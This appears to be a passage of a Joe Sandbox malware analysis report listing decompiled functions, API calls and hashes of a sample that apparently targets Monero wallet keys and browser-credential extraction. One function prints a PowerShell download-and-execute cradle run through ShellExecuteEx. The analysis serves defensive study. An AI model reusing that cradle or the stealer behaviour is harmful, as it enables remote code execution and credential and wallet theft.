                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 9f94b449426ccb0d70c7fe8dd0f5833ef47ff40275afc434ef870bf2c4261fd1
                          • Instruction ID: ecb4b1cbc255769e876f2461688dc3d8e438ef5d75e75d7664faa234bd991594
                          • Opcode Fuzzy Hash: 9f94b449426ccb0d70c7fe8dd0f5833ef47ff40275afc434ef870bf2c4261fd1
                          • Instruction Fuzzy Hash: 17312A74A00209EFDB14CF94D895BEE77B9FF48301F108198E901A7290DB75A985CFA1
                          Function 0092C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 752ec40b3d7e58f61c83b083da4ad3a40eab58307d02e1172123830afdb15f03
                          • Instruction ID: fe202ce327b00ed975f5692ca775184f756997d81929f2656b53c005906f77e3
                          • Opcode Fuzzy Hash: 752ec40b3d7e58f61c83b083da4ad3a40eab58307d02e1172123830afdb15f03
                          • Instruction Fuzzy Hash: E341F6F51007AC5FDB218B24AC84FFFBBEC9F45704F1444E8E98A86186D2719A848F60
                          Function 00924780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,010502F0), ref: 009247DB
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00924801
                          • lstrcat.KERNEL32(?,?), ref: 00924820
                          • lstrcat.KERNEL32(?,?), ref: 00924834
                          • lstrcat.KERNEL32(?,0103C748), ref: 00924847
                          • lstrcat.KERNEL32(?,?), ref: 0092485B
                          • lstrcat.KERNEL32(?,0104F5E0), ref: 0092486F
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 00928D90: GetFileAttributesA.KERNEL32(00000000,?,00911B54,?,?,0093564C,?,?,00930E1F), ref: 00928D9F
                            • Part of subcall function 00924570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00924580
                            • Part of subcall function 00924570: RtlAllocateHeap.NTDLL(00000000), ref: 00924587
                            • Part of subcall function 00924570: wsprintfA.USER32 ref: 009245A6
                            • Part of subcall function 00924570: FindFirstFileA.KERNEL32(?,?), ref: 009245BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 79b0a7453b63971a9d6a4fc7ae654dc107a95cd6c848a88c932befcc1f59909d
                          • Instruction ID: 556a604226cd32ac3f0389388ee588e2261b9808b88ebf299b21e6c45a806e22
                          • Opcode Fuzzy Hash: 79b0a7453b63971a9d6a4fc7ae654dc107a95cd6c848a88c932befcc1f59909d
                          • Instruction Fuzzy Hash: D83153B690031867CB10F7B0EC85FEE737CAB98700F404989B355A6095EEB4A7C98B95
                          Function 00922C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00922D85
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00922CC4
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00922D04
                          • ')", xrefs: 00922CB3
                          • <, xrefs: 00922D39
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: d7062f5a0cac7100957e7d69f9f7e42a8ff99cf32b7494a2dba4909ec0f52dd7
                          • Instruction ID: e3063e2e6445b9f8fc2df18137ebdfa8332d8efe927bf819dca40c9bbb6b9939
                          • Opcode Fuzzy Hash: d7062f5a0cac7100957e7d69f9f7e42a8ff99cf32b7494a2dba4909ec0f52dd7
                          • Instruction Fuzzy Hash: D641DF72D102189BDB14FFA0E892BDDB778AF94300F404159F006A7199DF746A4ACF95
                          Function 00919E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00919F41
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: aedd562587993b96604da1cd42065d034c87b9efc5b815f6a2eb4b0b687b40a7
                          • Instruction ID: f00404eca68d20e72506d9056f8195bec9fd2e043202f938e63dca172372dc8e
                          • Opcode Fuzzy Hash: aedd562587993b96604da1cd42065d034c87b9efc5b815f6a2eb4b0b687b40a7
                          • Instruction Fuzzy Hash: 02616D71A0021CAFDB24EFA4DC96FEE7779AF85304F408018F90A9B195EB746A45CB52
                          Function 00926920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0092696C
                          • sscanf.NTDLL ref: 00926999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009269B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009269C0
                          • ExitProcess.KERNEL32 ref: 009269DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 28dc1efa294c6e49fefd70e4a3eaf5a3ad44d50c697bde337823baee55a7177c
                          • Instruction ID: 89503bf2289dfd05c186966f7a5454d1638ba391f0146b7076c2b754f4a10313
                          • Opcode Fuzzy Hash: 28dc1efa294c6e49fefd70e4a3eaf5a3ad44d50c697bde337823baee55a7177c
                          • Instruction Fuzzy Hash: DD21E9B5D00218ABCF04EFE4E945AEEB7B9BF48301F04856AE406F3254EB345604CBA9
                          Function 00927E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00927E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0103D1C8,00000000,00020119,?), ref: 00927E5E
                          • RegQueryValueExA.ADVAPI32(?,0104F8E0,00000000,00000000,000000FF,000000FF), ref: 00927E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00927E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 2a0fdc2faeb053f67359fd937fb91fe8998e79c59007c20a6b9f75e1f27339b2
                          • Instruction ID: db4c6e0b0dd9450350c8d5dd6f133c5436bcab6543940c24fee7fe17347aea8a
                          • Opcode Fuzzy Hash: 2a0fdc2faeb053f67359fd937fb91fe8998e79c59007c20a6b9f75e1f27339b2
                          • Instruction Fuzzy Hash: C7114FB1A44305EBD710CBD4ED59F7BBBB8FB48711F104259F605B7294DB7459008BA1
                          Function 00929260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(0104FEB8,?,?,?,0092140C,?,0104FEB8,00000000), ref: 0092926C
                          • lstrcpyn.KERNEL32(00B5AB88,0104FEB8,0104FEB8,?,0092140C,?,0104FEB8), ref: 00929290
                          • lstrlen.KERNEL32(?,?,0092140C,?,0104FEB8), ref: 009292A7
                          • wsprintfA.USER32 ref: 009292C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: a69b5294445f9139f3cb2ee1ac6d31f19a318c88e6d92cc1bc654bc6262017a8
                          • Instruction ID: 1bd4c8c55f6e38a5b6827bbbce5b36cba1ba8e87c049f16526376608bef07574
                          • Opcode Fuzzy Hash: a69b5294445f9139f3cb2ee1ac6d31f19a318c88e6d92cc1bc654bc6262017a8
                          • Instruction Fuzzy Hash: 8801C075500209FFCB44DFDCD954EAD7BB9EB48355F108688F909A7204CA319A40DBD1
                          Function 009112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009112B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 009112BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009112D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009112F5
                          • RegCloseKey.ADVAPI32(?), ref: 009112FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: d594193c30f83b0decbd129fcbd56c5433882c2b82f629a64baf943bdc8de83a
                          • Instruction ID: c73693b10cc944d7baa358017896c01a83c6cdb6db2e5d5a446224ed03856242
                          • Opcode Fuzzy Hash: d594193c30f83b0decbd129fcbd56c5433882c2b82f629a64baf943bdc8de83a
                          • Instruction Fuzzy Hash: 0801C2B5A40308BBDB04DFD4DC59FAEB7B8EB48701F108195FA15A7280DA759A418F51
                          Function 00926630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00926663
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00926726
                          • ExitProcess.KERNEL32 ref: 00926755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: a5022cf0ce93f4961a76887252c7a38f9765c94385865aeec1d61352fe81093c
                          • Instruction ID: 8564e8392a33877c1f32646e916f6dd2c4987188cc12d57b808b83edf1fa09e8
                          • Opcode Fuzzy Hash: a5022cf0ce93f4961a76887252c7a38f9765c94385865aeec1d61352fe81093c
                          • Instruction Fuzzy Hash: 7B312DB2801228ABDB14EB90EC92FDE7778AF48300F404589F20577195DF746B88CF5A
                          Function 009287C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00930E28,00000000,?), ref: 0092882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00928836
                          • wsprintfA.USER32 ref: 00928850
